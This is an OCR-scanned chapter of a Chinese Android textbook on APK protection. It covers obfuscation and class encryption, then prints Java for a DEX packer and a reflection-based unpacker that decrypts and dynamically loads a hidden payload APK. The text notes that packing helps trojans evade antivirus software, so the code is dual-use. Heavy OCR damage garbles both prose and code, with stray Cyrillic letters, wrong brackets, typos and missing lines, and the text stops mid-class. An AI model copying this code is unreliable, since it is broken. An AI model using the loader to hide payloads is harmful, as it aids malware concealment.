所 以 保护 APK 文件 的 安全 性 一 直 是 广大 程序 员 的 重要 任务 之 一 。 在 现实 应 用 中 ， 通 常 使 用 加 过 技术 来 提高 
Android 应 用 程序 的 安全 性 ， 通 过 加 壳 技术 可 以 有 效 地 防止 应 用 程序 被 破解 。 本 章 将 详细 讲解 Android 加 壳 
技术 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


17.1 常用 的 APK 保护 技术 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 17 章 \ 常 用 的 APK 保护 技术 .avi 

在 当前 市 场 环境 下 ， 因 为 Java 字 节 码 的 抽象 级 别 较 高 ， 所 以 Android 的 АРК 文件 很 容易 被 反 编译 ， 这 
样 就 带 来 了 很 大 的 安全 隐患 ， 例 如 ， 如 果 一 款 应 用 АРК 被 破解 ， 那 么 可 能 会 被 他 人 植 入 广告 或 者 病毒 以 供 
他 人 熏 利 或 窃取 用 户 信息 ;如 果 一 款 游 戏 APK 被 破解 ， 那 么 这 款 游戏 可 能 会 从 收费 版 变 成 免费 版 ， 游 戏 的 
支付 系统 也 形同虚设 。 

对 于 开发 者 来 说 ，APK 被 破解 绝对 是 一 场 亚 梦 ， 而 自己 手动 设置 各 种 加 密 不 但 耗 时 耗 力 ， 而 且 不 一 定 
能 收 到 很 好 的 效果 。 这 样 保护 Java 字 节 码 不 被 反 编 译 就 成 为 了 广大 程序 员 的 重要 任务 之 一 。 尽 管 不 能 够 绝 
对 防止 程序 被 反 编译 ， 但 是 努力 提高 反 编译 的 难度 是 大 为 可 行 的 。 在 当今 技术 条 件 下 ， 有 如 下 5 种 常用 的 
APK 保护 技术 。 

(1) 隔离 Java 程序 

最 简单 的 方法 就 是 让 用 户 不 能 够 访问 到 Java Class 程序 ， 这 种 方法 是 最 根本 的 方法 ， 具 体 实现 有 多 种 方 
式 。 例 如 , 开发 人 员 可 以 将 关键 的 Java Class 放 在 服务 器 端 , 客户 端 通过 访问 服务 器 的 相关 接口 来 获得 服务 ， 
而 不 是 直接 访问 Class 文件 。 这 样 黑客 就 没有 办 法 反 编 译 Class 文件 。 目 前 ， 通 过 接口 提供 服务 的 标准 和 协 
议 也 越 来 越 多 ， 例 如 HTTP. Web Service, RPC 等 。 但 是 有 很 多 应 用 都 不 适合 这 种 保护 方式 ， 例 如 对 于 单 
机 运行 的 程序 就 无 法 隔离 Java 程序 。 

(2) 对 Class 文件 进行 加 密 

为 了 防止 Class 文件 被 直接 反 编译 ， 许 多 开发 人 员 将 一 些 关 键 的 Class 文件 进行 加 密 ， 例 如 对 注册 码 、 
序列 号 管理 相关 的 类 等 。 在 使 用 这 些 被 加 密 的 类 之 前 ， 程 序 首先 需要 对 这 些 类 进行 解密 ， 而 后 再 将 这 些 类 
装载 到 JVM 当中 。 这 些 类 的 解密 可 以 由 硬件 完成 ， 也 可 以 使 用 软件 完成 。 

在 具体 实现 时 , 开发 人 员 往 往 通过 自 定义 ClassLoader 类 来 完成 加 密 类 的 装载 (注意 由 于 安全 性 的 原因 ， 
Applet 不 能 够 支持 自 定义 的 ClassLoader) 。 自 定义 的 ClassLoader 首先 找到 加 密 的 类 ， 而 后 进行 解密 ， 最 后 
将 解密 后 的 类 装载 到 JVM 当中 。 在 这 种 保护 方式 中 ， 自 定义 的 ClassLoader 是 非常 关键 的 类 。 由 于 它 本 身 
不 是 被 加 密 的 ， 因 此 可 能 成 为 黑客 最 先 攻击 的 目标 。 如 果 相 关 的 解密 密 钥 和 算法 被 攻克 ， 那 么 被 加 密 的 类 
也 很 容易 被 解密 。 

(3) 转换 成 本 地 代码 
将 程序 转换 成 本 地 代码 也 是 一 种 防止 反 编译 的 有 效 方法 ， 因 为 本 地 代码 往往 难以 被 反 编译 。 开 发 人 员 
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可 以 选择 将 整个 应 用 程序 转换 成 本 地 代码 ， 也 可 以 选择 关键 模块 转换 。 如 果 仅 仅 转换 关键 部 分 模块 ，Java 
程序 在 使 用 这 些 模块 时 ， 需 要 使 用 INI 技术 进行 调用 。 当 然 ， 在 使 用 这 种 技术 保护 Java 程序 的 同时 ， 也 牺 
牲 了 Java 的 跨 平 台 特性 。 对 于 不 同 的 平台 ， 需 要 维护 不 同 版 本 的 本 地 代码 ， 这 将 加 重 软件 支持 和 维护 的 工 
作 。 不 过 对 于 一 些 关键 的 模块 ， 有 时 这 种 方案 往往 是 必要 的 。 为 了 保证 这 些 本 地 代码 不 被 修改 和 替代 ， 通 
常 需要 对 这 些 代码 进行 数字 签名 。 在 使 用 这 些 本 地 代码 之 前 ， 往 往 需 要 对 其 进行 认证 ， 确 保 这 些 代码 没有 
被 黑客 更 改 。 如 果 签 名 检查 通过 ， 则 调用 相关 NI 方法。 

(4) 代码 混淆 

代码 混淆 是 对 Class 文件 进行 重新 组 织 和 处 理 ， 使 得 处 理 后 的 代码 与 处 理 前 代码 完成 相同 的 功能 〈 语 
Ж) 。 但 是 混淆 后 的 代码 很 难 被 反 编译 ， 即 反 编 译 后 得 出 的 代码 非常 难 懂 、 上 涩 ， 因 此 反 编 译 人 员 很 难得 
出 程序 的 真正 语义 。 从 理论 上 来 说 ， 黑 客 如 果 有 足够 的 时 间 ， 被 混淆 的 代码 仍然 可 能 被 破解 ， 甚 至 目前 有 
些 人 正在 研制 反 混淆 的 工具 。 但 是 从 实际 情况 来 看 ， 由 于 混淆 技术 的 多 元 化 发 展 ， 混 淆 理论 的 成 熟 ， 经 过 
混淆 的 Java 代码 还 是 能 够 很 好 地 防止 反 编译 。 下 面 将 详细 介绍 混淆 技术 ， 因 为 混淆 是 一 种 保护 Java 程序 
的 重要 技术 。 

(5) 在 线 加 密 

APK Protect (http://www.apkprotect.com/) 是 一 个 在 线 对 АРК 程序 进行 加 密 的 网 站 ， 可 以 支持 Java 和 
C++ 语言 的 保护 ， 能 达到 反 调 试 、 反 编译 的 效果 ， 操 作 过 程 简单 易 用 : 仅 需 上 传 APK， 选 择 加 密 项 目 ， 等 
待 服务 器 加 密 (通常 一 两 个 小 时 左右 ) 后 即 可 下 载 加 壳 的 APK， 然 后 再 签名 上 传 到 应 用 市 场 即 可 。 经 测试 ， 
通过 APK Protect 加 密 的 APK 变 得 非常 难以 破解 ， 从 而 保护 了 АРК. 
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加 壳 是 指 利 用 特殊 的 算法 对 EXE. DLL 文件 里 的 资源 进行 压缩 、 加 密 。 加 壳 类 似 WINZIP 的 效果 ， 只 
不 过 这 个 压缩 之 后 的 文件 可 以 独立 运行 ， 解 压 过 程 完全 隐蔽 ， 都 在 内 存 中 完成 。 它 们 附加 在 原 程 序 上 通过 
Windows 加 载 器 载 入 内 存 后 ， 先 于 原始 程序 执行 ， 得 到 控制 权 ， 执 行 过程 中 对 原始 程序 进行 解密 、 还 原 
还 原 完 成 后 再 把 控制 权 交还 给 原始 程序 ， 执 行 原来 的 代码 部 分 。 加 上 外 壳 后 ， 原 始 程序 代码 在 磁盘 文件 中 
- 般 是 以 加 密 后 的 形式 存在 的 ， 只 在 执行 时 在 内 存 中 还 原 ， 这 样 就 可 以 有 效 地 防止 破解 者 对 程序 文件 的 非 
法 修改 ， 同 时 也 可 以 防止 程序 被 静态 反 编 译 。 

通过 使 用 加 壳 工 具 可 以 在 文件 头 中 加 一 段 指令 ,告诉 CPU 怎么 才能 解压 自己 。 现 在 CPU 的 运算 速度 快 ， 
所 以 这 个 解压 过 程 不 会 看 出 什么 ， 软 件 一 下 就 打开 了 ， 只 有 当 机 器 配置 非常 差 时 才 会 感觉 到 不 加 壳 和 加 壳 
后 的 软件 运行 速度 的 差别 。 当 进行 加 过 时 ， 其 实 就 是 给 可 执行 的 文件 加 上 一 个 “外 衣 ”， 机 器 上 执行 的 只 
是 这 个 外 过 程序 。 当 执行 这 个 程序 时 ， 这 个 壳 就 会 把 原来 的 程序 在 内 存 中 解 开 ， 解 开 后 就 交 给 真正 的 程序 。 
所 以 ， 这 些 工作 只 是 在 内 存 中 运行 的 ， 无 法 了 解 具体 是 怎样 在 内 存 中 运行 。 通 常 说 的 对 外 过 加 密 ， 都 是 指 
网 上 很 多 免费 或 者 非 免费 的 软件 被 一 些 专门 的 加 壳 程 序 加 壳 ， 基 本 上 是 对 程序 的 压缩 或 者 不 压缩 。 这 是 因 
为 有 时 程序 会 过 大 ， 需 要 压缩 ， 但 是 大 部 分 的 程序 是 因为 防止 反 跟 踪 、 防 止 程序 被 跟踪 调试 、 防 止 算法 程 
序 被 静态 分 析 ， 加 密 代码 和 数据 ， 可 保护 程序 数据 的 完整 性 ， 使 程序 不 被 修改 或 者 被 窥视 程序 的 内 幕 。 

加 “过 ”虽然 增加 了 CPU 负担 ， 但 是 减少 了 硬盘 读 写 时 间 ， 实 际 应 用 时 加 “ 壳 ” 以 后 程序 运行 速度 更 
快 〈 当 然 有 的 加 “ 壳 ” 以 后 会 变 慢 ， 那 是 选择 的 加 “ 壳 ” 工 具 问 题 )。 一 般 软件 都 加 “ 壳 ”， 这 样 不 但 可 
以 保护 自己 的 软件 不 被 破解 、 修 改 ， 还 可 以 增加 运行 时 启动 速度 。 加 “ 壳 ” 不 等 于 木马 ， 平 时 用 到 的 绝 大 
多 数 软 件 都 加 了 自己 的 专用 “ 壳 ”。 
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RAR 和 ZIP 都 是 压缩 软件 ， 不 是 加 “ 壳 ” 工 具 ， 解 压 时 是 需要 进行 磁盘 读 写 ，“ 壳 ”的 解压 缩 是 直接 
在 内 存 中 进行 的 。 试 试用 RAR 或 者 ZIP 压缩 一 个 病毒 ， 解 压缩 时 杀毒 软件 肯定 会 发 现 。 而 用 加 “过 ”手段 
封装 木马 ， 能 发 现 的 杀毒 软件 就 少 得 多 。 

木马 加 壳 的 原理 很 简单 ， 在 黑客 营 中 提供 的 多 数 木 马 中 ， 很 多 都 是 经 过 处 理 的 ， 而 这 些 处 理 就 是 所 谓 
的 加 壳 。 当 一 个 EXE 的 程序 生成 好 后 ， 就 可 以 利用 诸如 资源 工具 和 反 汇 编 工 具 轻松 地 对 它 进行 修改 ， 但 如 
果 程 序 员 给 EXE 程序 加 一 个 壳 , 那么 至 少 这 个 加 了 壳 的 EXE 程序 就 不 是 那么 好 修改 了 , 如 果 想 修改 就 必须 
先 脱 壳 。 
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加 这 是 在 二 进 制 的 程序 中 植 入 一 段 代码 ， 在 运行 时 优先 取得 程序 的 控制 权 ， 并 做 一 些 额外 的 工作 。 大 
多 数 病毒 是 基于 上 述 原理 实现 的 ， 例 如 ，EXE 文件 加 壳 的 过 程 如 图 17-1 所 示 。 


这 是 指 在 一 个 程序 的 外 部 包 囊 上 另外 一 段 代 
码 ， 以 保护 里 面 的 代码 不 被 非法 修改 或 反 编 | [Оруну 
详 。 这 段 代码 通常 先 于 程序 的 运行 。 会 优先 Pih 

获得 程序 的 控制 权 ， 然 后 完成 保护 任务 。 


N ji 
М] Loader) |“ 
EXE 文 件 压缩 数据 EXE 文 件 
( 原 EXE 
文件 ) 
原文 件 ШЕЛ 运行 映射 到 内 存 


图 17-1 EXE 文件 加 壳 的 过 程 
当前 在 PC 平台 中 已 经 存在 了 大 量 标准 的 加 过 和 解 过 工具 ,但 是 Android 作为 一 个 新 兴 的 智能 设备 平台 ， 
АРК 加 过 工具 非常 少 。Android 中 DEX 文件 大 量 使 用 引用 给 加 壳 带 来 了 一 定 难度 ， 在 Android APK 加 过 过 
程 中 会 牵扯 到 如 下 3 个 角色 。 
CD 加 壳 程 序 : 加 密 源 程 序 为 解 壳 数据、 组 装 解 壳 程序 和 解 壳 数 据 。 
(2) 解 壳 程序 : 解密 解 壳 数据 ， 运 行 时 通过 DexClassLoader 动态 加 载 。 
G) 源 程序 : 需要 加 壳 处 理 的 被 保护 代码 。 
根据 解 沉 数据 在 解 过 程序 DEX 文件 中 的 分 布 位 置 , 可 以 通过 如 下 两 种 方式 实现 对 Android DEX 的 加 过 
操作 。 
17.3.4 解 壳 数据 位 于 解 壳 程 序 文件 尾部 
当 解 壳 数 据 位 于 解 壳 程 序 文件 尾部 方式 时 ， 加 壳 合 并 后 的 DEX 文件 的 具体 结构 如 图 17-2 所 示 。 
当 解 壳 数据 位 于 解 壳 程序 文件 尾部 时 ， 加 壳 Android DEX 的 流程 如 下 所 示 。 


(1) 加 密 源 程序 APK 文件 为 解 壳 数据 。 
(2) 把 解 过 数据 写 入 解 壳 程序 DEX 文件 末尾 ， 并 在 文件 尾部 添加 解 壳 数据 的 大 小 。 


KI 
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(3) 修改 解 过 程序 DEX 头 中 checksum, signature 和 file_size 头 信息 。 
Са) 修改 源 程序 AndroidManifest.xml 文件 ， 然 后 覆盖 解 过 程序 AndroidManifest.xml 文件 。 
DEX Header 


checksum 


signature 


file size 


解 这 DEX Body 


IiSource DEX 数 据 长 度 


图 17-2 合并 后 的 DEX 结构 
根据 上 述 方案 的 具体 实现 流程 ， 可 以 编写 如 下 加 壳 代码 。 


package com.android.dexjiake; 
import java.io.ByteArrayOutputStream; 


import java. 
import java. nputStream; 
import java.io.FileOutputStream; 


import java.io.IOException; 

import java.security.MessageDigest; 

import java.security.NoSuchAlgorithmException; 
import java.util.zip.Adler32; 


public class DexjiakeTool ( 
public static void main(String[ ] args) ( 

И TODO Auto-generated method stub 

try ( 
File payloadSrcFile = new File("g:/payload.apk"); 
File unShellDexFile = new File("g:/unshell.dex"); 
byte[ ] payloadArray = encrpt(readFileBytes(payloadSrcFile)); 
byte[ ] unShellDexArray = readFileBytes(unShellDexFile); 
int payloadLen = payloadArray.length; 
int unShellDexLen = unShellDexArray.length; 
int totalLen = payloadLen + unShellDexLen +4; 
byte[ ] newdex = new byte[totalLen]; 
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// 添 加 解 壳 代 码 

System.arraycopy (unShellDexArray, 0, newdex, 0, unShellDexLen); 
// 添 加 加 密 后 的 解 壳 数据 

System.arraycopy(payloadArray, 0, newdex, unShellDexLen, 
payloadLen); 

// 添 加 解 壳 数据 长 度 

System.arraycopy(intToByte(payloadLen), 0, newdex, totalLen-4, 4); 
/修改 DEX file size 文件 头 

fixFileSizeHeader(newdex); 

/修改 DEX SHA1 文件 头 

fixSHA1Header(newdex); 

// 修 改 DEX CheckSum 文件 头 

fixCheckSumHeader(newdex); 


String str = "g:/classes.dex"; 

File file = new File(str); 

if (Ifile.exists()) ( 
file.createNewFile(); 

} 


FileOutputStream localFileOutputStream = new FileOutputStream(str); 
localFileOutputStream.write(newdex); 

localFileOutputStream.flush(); 

localFileOutputStream.close(); 


) catch (Exception e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 


// 直 接 返 回 数据 ， 读 者 可 以 添加 自己 的 加 密 方法 
private static byte[ ] encrpt(byte[ ] srcdata)( 


return srcdata; 


private static void fixCheckSumHeader(byte[ ] dexBytes) ( 


Adler32 adler = new Adler32(); 

adler.update(dexBytes, 12, dexBytes.length - 12); 

long value = adler.getValue(); 

int va = (int) value; 

byte[ ] newcs = intToByte(va); 

byte[ ] recs = new byte[4]; 

for (int i = 0; i < 4; i++) ( 
recs[i] = newcs[newcs.length - 1 - iJ; 
System.out.println(Integer.toHexString(newcs[i])); 


} 

System.arraycopy(recs, 0, dexBytes, 8, 4); 
System.out.printin(Long.toHexString(value)); 
System.out. printin(); 
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} 
public static byte[ ] intToByte(int number) { 
byte[ ] b = new byte[4]; 
for (int i = 3; i >= 0; i--) { 
bfi] = (byte) (number % 256); 
number >>= 8; 
} 
return b; 
} 
private static void fixSHA1Header(byte[ ] dexBytes) 
throws NoSuchAlgorithmException { 
MessageDigest md = MessageDigest.getInstance("SHA-1"); 
md.update(dexBytes, 32, dexBytes.length - 32); 
byte[ ] newdt = md.digest(); 
System.arraycopy(newdt, 0, dexBytes, 12, 20); 
String hexstr = ""; 
for (int i = 0; i < newdt.length; i++) { 
hexstr += Integer.toString((newdt[i] & Ох) + 0x100, 16) 
-substring(1); 
} 
System.out.printIn(hexstr); 
} 
private static void fixFileSizeHeader(byte[ ] dexBytes) { 
byte[ ] newfs = int ToByte(dexBytes.length ); 
System.out.printIn(Integer.toHexString(dexBytes.length)); 
byte[] refs = new byte[4]; 
for (int i= 0; i < 4; i++) { 
refs[i] = newfs[newfs.length - 1 - i]; 
System.out.println(Integer.toHexString(newfs[i])); 
) 
System.arraycopy(refs, 0, dexBytes, 32, 4); 
) 
private static byte[ ] readFileBytes(File file) throws IOException { 
byte[ ] arrayOfByte = new byte[1024]; 
ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream(); 
FilelnputStream fis = new FilelnputStream(file); 
while (true) { 
int i = fis.read(arrayOfByte); 
if (i !=-1) ( 
localByteArrayOutputStream.write(arrayOfByte, 0, i); 
) else { 
return localByteArrayOutputStream.toByteArray(); 
) 


) 
) 
当 解 壳 数据 位 于 解 壳 程 序 文件 尾部 时 ， 解 壳 Android DEX 流程 如 下 所 示 。 
CD 读 取 DEX 文件 末尾 数据 获取 解 壳 数据 长 度 。 
(2) 从 DEX 文件 读 取 解 壳 数 据 ， 解 密 解 壳 数据 ， 以 文件 形式 保存 解密 数据 到 一 个 APK 文件 ， 例 如 aapke 
(3) 通过 DEXClassLoader 动态 加 载 文件 aapk。 


@ 
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在 上 述 解 壳 过 程 中 ， 需 要 重点 考虑 如 下 4 个 问题 。 

а 如 何在 第 一 时 间 执 行 解 达 代码 

Android 应 用 程序 是 由 不 同 的 组 件 构成 的 ， 系 统 会 在 需要 时 启动 程序 组 件 。 解 这 程序 必须 在 Android Ж 
统 启动 组 件 之 前 运行 ， 以 完成 对 解 过 数据 的 解 这 及 APK 文件 的 动态 加 载 ， 否 则 会 使 程序 出 现 加 载 类 失败 的 

Android 程序 员 都 知道 Application 作为 整个 应 用 的 上 下 文 , 会 被 系统 第 一 时 间 调 用 , 这 也 是 应 用 开发 者 


程序 代码 的 第 一 执行 点 。 因 此 通过 配置 文件 AndroidManifest.xml 中 的 application 字段 可 以 实现 解 壳 代码 第 
-时 间 运 行 。 
<application 


android:icon="@drawable/ic_launcher" 
android:label="@string/app_name" 
android:theme="@style/AppTheme" android:name="<span style="color: rgb(255, 0, 0);"><em><strong> 
com.android.dexunjieke.ProxyApplication</strong></em></span>" > 
</application> 
О 如 何 替换 回 源 程序 原 有 的 Application 
当 文件 AndroidManifestxml 被 配置 为 解 克 代码 的 程序 时 ， 会 蔡 换 源 程序 中 原 有 的 程序 ， 为 了 不 影响 源 
程序 代码 的 逻辑 性 ， 需 要 在 解 达 代码 运行 完成 后 奉 换 回 源 程 序 原 有 的 程序 对 象 ， 通 常 在 文件 
AndroidManifestxml 中 配置 原 有 程序 类 信息 来 实现 这 一 目的 。 解 壳 程 序 要 在 运行 完毕 后 通过 创建 配置 的 程序 
对 象 ， 并 通过 反射 修改 回 原 有 的 程序 。 
<application 
android:icon="@drawable/ic_launcher" 
android:label="@string/app_name" 
android:theme="@style/AppTheme" android:name="<em><strong><span style="color: rgb(255, 0, 
0);">com.android.dexunjieke.ProxyApplication</span></strong></em>" > 
<span style="color: rgb(255, 0, 0);"><em><strong><meta-data android:name="APPLICATION _ 
CLASS МАМЕ" android:value="com.*** .Application"/></strong></em></span> 
</application> 
UO 如 何 通过 DexClassLoader 动 态 加 载 APK 代 码 
在 Android 系统 中 ，DexClassLoader 加 载 的 类 没有 组 件 生命 周期 ， 即 使 DexClassLoader 通过 对 APK 的 
动态 加 载 完 成 了 对 组 件 类 的 加 载 ， 当 系统 启动 该 组 件 时 还 会 出 现 类 加 载 失败 异常 。 通过 查看 Android 源 代码 
可 知 , 组 件 类 的 加 载 是 由 另 一 个 ClassLoader 来 完成 的 , DexClassLoader 和 系统 组 件 ClassLoader 并 不 存在 关 
系 ， 所 以 系统 组 件 ClassLoader 找 不 到 由 DexClassLoader 加 载 的 类 。 如 果 把 系统 组 件 ClassLoader 的 parent 
修改 成 DexClassLoader， 就 可 以 实现 对 APK 代码 的 动态 加 载 。 
о 代码 如 何 动态 引用 解 壳 后 的 APK 资 源 文 件 
因为 在 最 外 层 的 解 壳 程 序 中 保存 了 程序 代码 默认 引用 的 资源 文件 ， 所 以 需要 增加 系统 的 资源 加 载 路 径 
来 实现 对 解 克 后 APK 文件 资源 的 加 载 。 
当 解 壳 数 据 位 于 解 壳 程序 文件 尾部 时 ， 根 据 前 面 介绍 的 解 壳 Android DEX 流程 可 以 编写 出 如 下 所 示 的 
通用 解 这 代码。 


package com.android.dexunjieke; 


import java.io.BufferedInputStream; 
import java.io.ByteArraylnputStream; 
import java.io.ByteArrayOutputStream; 
import java.io.DatalnputStream; 

import java.io.File; 
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import java.io.FilelnputStream; 
import java.io.FileOutputStream; 
import java.io.IOException; 

import java.lang.ref.WeakReference; 
import java.util.ArrayList; 

import java.util.HashMap; 

import java.util.Iterator; 

import java.util.zip.ZipEntry; 

import java.util.zip.ZipInputStream; 


import dalvik.system.DexClassLoader; 

import android.app.Application; 

import android.content.pm.ApplicationInfo; 

import android.content.pm.PackageManager; 

import android.content.pm.PackageManager.NameNotFoundException; 
import android.os.Bundle; 

public class ProxyApplication extends Application ( 


private static final String appkey = "APPLICATION CLASS МАМЕ"; 
private String apkFileName; 

private String odexPath; 

private String libPath; 


protected void attachBaseContext(Context base) ( 
super.attachBaseContext(base); 
try{ 

File odex = this.getDir("payload odex", MODE PRIVATE); 

File libs = this.getDir("payload lib", MODE PRIVATE); 

odexPath = odex.getAbsolutePath(); 

libPath = libs.getAbsolutePath(); 

apkFileName = odex.getAbsolutePath() + "/payload.apk"; 

File dexFile = new File(apkFileName); 

if (IdexFile.exists()) 

dexFile.createNewFile(); 

// 读 取 程 序 classes.DEX 文件 

byte[ ] dexdata = this.readDexFileFromApk(); 

/分 离 出 解 壳 后 的 APK 文件 用 于 动态 加 载 

this.splitPayLoadFromDex(dexdata); 

// 配 置 动态 加 载 环境 

Object currentActivityThread = Refanshe.invokeStaticMethod( 
"android.app.ActivityThread", "currentActivityThread", 
new Class[ ] { }, new Object[] { }); 

String packageName = this.getPackageName(); 

HashMap mPackages = (HashMap) Refanshe.getFieldOjbect( 
“android.app.ActivityThread", currentActivityThread, 
"mPackages"); 

WeakReference wr = (WeakReference) mPackages.get(packageName); 

DexClassLoader dLoader = new DexClassLoader(apkFileName, odexPath, 
libPath, (ClassLoader) Refanshe.getFieldOjbect( 
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"android.app.LoadedApk", wr.get(), "mClassLoader")); 
Refanshe.setFieldOjbect("android.app.LoadedApk", "mClassLoader", 
wr.get(), dLoader); 


) catch (Exception e) ( 
II TODO Auto-generated catch block 
e.printStackTrace(); 


public void onCreate() ( 
{ 


// 如 果 源 应 用 配置 有 Application 对 象 ， 则 替换 为 源 应 用 Applicaiton， 以 便 不 影响 源 程序 逻辑 
String appClassName = null; 
try { 
Applicationinfo ai = this.getPackageManager() 
.getApplicationInfo(this.getPackageName(), 
PackageManager.GET META DATA); 
Bundle bundle = ai.metaData; 
if (bundle != null 
&& bundle.containsKey("APPLICATION CLASS NAME") { 
appClassName = bundle.getString("APPLICATION CLASS NAME"); 
) else { 
return; 
) 
) catch (NameNotFoundException e) ( 
11 TODO Auto-generated catch block 
e.printStackTrace(); 


Object currentActivityThread = Refanshe.invokeStaticMethod( 
"android.app.Activity Thread", "currentActivityThread", 
new Class[ ] ( }, new Object[] ( }); 

Object mBoundApplication = Refanshe.getFieldOjbect( 
"android.app.Activity Thread", currentActivityThread, 
"mBoundApplication"); 

Object loadedApkinfo = Refanshe.getFieldOjbect( 
"android.app.ActivityThread$AppBindData", 
mBoundApplication, "info"); 

Refanshe.setFieldOjbect("android.app.LoadedApk", "mApplication", 
loadedApkinfo, null); 

Object oldApplication = Refanshe.getFieldOjbect( 
"android.app.ActivityThread", currentActivity Thread, 
"minitialApplication"); 

ArrayList<Application> mAllApplications = (ArrayList<Application>) Refanshe 
.getFieldOjbect("android.app.Activity Thread", 
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currentActivityThread, "mAllApplications"); 
mAllApplications.remove(oldApplication); 

ApplicationInfo appinfo In LoadedApk = (ApplicationInfo) Refanshe 
-getFieldOjbect("android.app.LoadedApk", loadedApkinfo, 

"mApplicationinfo"); 

ApplicationInfo appinfo In AppBindData = (ApplicationInfo) Refanshe 
.getFieldOjbect("android.app.Activity Thread$AppBindData", 

mBoundApplication, "applInfo"); 

appinfo In LoadedApk.className = appClassName; 

appinfo In AppBindData.className = appClassName; 

Application app 7 (Application) Refanshe.invokeMethod( 
"android.app.LoadedApk", "makeApplication", loadedApklnfo, 
new Class[ ] ( boolean.class, Instrumentation.class }, 
new Object[ ] ( false, null }); 

Refanshe.setFieldOjbect("android.app.Activity Thread", 
"mlnitialApplication", currentActivityThread, app); 


HashMap mProviderMap = (HashMap) Refanshe.getFieldOjbect( 
"android.app.Activity Thread", currentActivity Thread, 
"mProviderMap"); 

Iterator it = mProviderMap.values().iterator(); 

while (it.hasNext()) { 

Object providerClientRecord = it.next(); 

Object localProvider = Refanshe.getFieldOjbect( 
"android.app.Activity Thread$ProviderClientRecord", 
providerClientRecord, "mLocalProvider"); 

Refanshe.setFieldOjbect('android.content.ContentProvider", 
"mContext", localProvider, app); 

} 

app.onCreate(); 


private void splitPayLoadFromDex(byte[ ] data) throws IOException { 


byte[ ] apkdata = decrypt(data); 

int ablen = apkdata.length; 

byte[ ] dexlen = new byte[4]; 

System.arraycopy(apkdata, ablen - 4, dexlen, 0, 4); 

ByteArrayInputStream bais = new ByteArrayInputStream(dexlen); 

DatalnputStream in = new DatalnputStream(bais); 

int readint = in.readInt(); 

System.out.printIn(Integer.toHexString(readlnt)); 

byte[ ] newdex = new byte[readint]; 

System.arraycopy(apkdata, ablen - 4 - readInt, newdex, 0, readlnt); 

File file = new File(apkFileName); 

try{ 
FileOutputStream localFileOutputStream = new FileOutputStream(file); 
localFileOutputStream.write(newdex); 
localFileOutputStream.close(); 
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} catch (IOException locallOException) { 
throw new RuntimeException(locallOException); 
} 
ZiplnputStream localZiplnputStream = new ZipInputStream( 
new BufferedInputStream(new FilelnputStream(file))); 
while (true) ( 
ZipEntry localZipEntry = localZiplnputStream.getNextEntry(); 
if (localZipEntry == null) ( 
localZiplnputStream.close(); 
break; 
} 
String name = localZipEntry.getName(); 
if (name.startsWith("lib/") && name.endsWith(".so")) { 
File storeFile = new File(libPath + "/" 
+ name.substring(name.lastIndexOf('/))); 
storeFile.createNewFile(); 
FileOutputStream fos = new FileOutputStream(storeFile); 
byte[ ] arrayOfByte = new byte[1024]; 
while (true) ( 
int i = localZipInputStream.read(arrayOfByte); 
if (i == -1) 
break; 
fos.write(arrayOfByte, 0, i); 
} 
fos.flush(); 
fos.close(); 
} 
localZiplnputStream.closeEntry(); 


) 
localZiplnputStream.close(); 


private byte[ ] readDexFileFromApk() throws IOException ( 
ByteArrayOutputStream dexByteArrayOutputStream = new ByteArrayOutputStream(); 
ZiplnputStream localZiplnputStream = new ZiplnputStream( 
new BufferedInputStream(new FilelnputStream( 
this.getApplicationInfo().sourceDir))); 
while (true) ( 
ZipEntry localZipEntry = localZiplnputStream.getNextEntry(); 
if (localZipEntry == null) ( 
localZipInputStream.close(); 
break; 
} 
if (localZipEntry.getName().equals("classes.dex")) { 
byte[ ] arrayOfByte = new byte[1024]; 
while (true) { 


dexByteArrayOutputStream.write(arrayOfByte, 0, i); 
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} 
} 
localZiplnputStream.closeEntry(); 
} 
localZipInputStream.close(); 


return dexByteArrayOutputStream.toByteArray(); 


// 直 接 返 回 数据 ， 读 者 可 以 添加 自己 的 解密 方法 
private byte[ ] decrypt(byte[ ] data) ( 
return data; 
} 
下 面 的 类 Refanshe 是 一 个 反射 调用 工具 类 。 
public class Refanshe ( 


public static Object invokeStaticMethod(String class name, String method name, Class[ ] pareTyple, 
Object[ ] pareVaules)( 


try( 
Class obj class = Class.forName(class name); 
Method method = obj class.getMethod(method name,pareTyple); 
return method.invoke(null, pareVaules); 

) catch (SecurityException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalArgumentException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalAccessException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

) catch (NoSuchMethodException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (InvocationTargetException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (ClassNotFoundException e) { 
11 TODO Auto-generated catch block 
e.printStackTrace(); 

} 


return null; 


} 


public static Object invokeMethod(String class_name, String method name, Object obj ,Class[ ] pareTyple, 
Object[ ] pareVaules)( 


try{ 


Class obj_class = Class.forName(class_name); 
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Method method = obj class.getMethod(method name,pareTyple); 
return method.invoke(obj, pareVaules); 

) catch (SecurityException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalargumentException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalAccessException e) { 
/| TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (NoSuchMethodException e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (InvocationTargetException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (ClassNotFoundException e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 

} 


return null; 


} 


public static Object getFieldOjbect(String class name, Object obj, String filedName)( 

try{ 
Class obj_class = Class.forName(class_name); 
Field field = obj_class.getDeclaredField(filedName); 
field.setAccessible(true); 
return field.get(obj); 

) catch (SecurityException e) ( 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (NoSuchFieldException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalArgumentException e) { 
I| TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (IllegalAccessException e) { 
ЇЇ TODO Auto-generated catch block 
e.printStackTrace(); 

} catch (ClassNotFoundException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 

} 


return null; 
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public static Object getStaticFieldOjbect(String class name, String filedName)( 


